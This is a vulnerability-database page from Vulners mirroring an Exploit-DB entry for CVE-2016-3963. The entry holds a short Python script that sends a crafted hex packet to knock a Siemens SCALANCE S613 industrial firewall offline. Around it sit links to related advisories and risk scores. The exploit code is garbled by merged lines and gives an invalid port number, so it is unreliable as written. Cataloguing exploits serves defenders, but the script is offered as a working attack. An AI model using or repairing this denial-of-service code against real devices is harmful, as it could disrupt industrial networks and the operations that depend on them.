Lucene search
K

Siemens SCALANCE S613 - Remote Denial of Service

🗓️ 23 May 2018 00:00:00Reported by t4rkd3vilzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Siemens SCALANCE S613 - Remote Denial of Service CVE-2016-3963. Exploit allows remote attackers to cause a denial of servic

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Siemens SCALANCE S613 Denial of Service
8 May 201900:00
nessus
Tenable Nessus
Siemens SCALANCE S613 Denial of Service (CVE-2016-3963)
4 Dec 202400:00
nessus
CNVD
Siemens SCALANCE S613 Denial of Service Vulnerability
11 Apr 201600:00
cnvd
CVE
CVE-2016-3963
8 Apr 201615:00
cve
Cvelist
CVE-2016-3963
8 Apr 201615:00
cvelist
EUVD
EUVD-2016-4972
7 Oct 202500:30
euvd
exploitpack
Siemens SCALANCE S613 - Remote Denial of Service
23 May 201800:00
exploitpack
ICS
Siemens SCALANCE S613 Denial-of-Service Vulnerability
14 Jan 201607:00
ics
NVD
CVE-2016-3963
8 Apr 201615:59
nvd
Packet Storm
Siemens SCALANCE S613 Denial Of Service
24 May 201800:00
packetstorm
Rows per page
 # Exploit Title: Siemens SCALANCE S613 - Remote Denial of Service 
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions.
# Tested on: Kali Linux
# CVE: CVE-2016-3963

#!/usr/bin/python

import socket import sys if len(sys.argv) < 2: print('Usage: ' +
sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' +
sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00
00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock =
socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload,
(sys.argv[1], 5000000))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 May 2018 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 25
CVSS 35.3
EPSS0.06491
31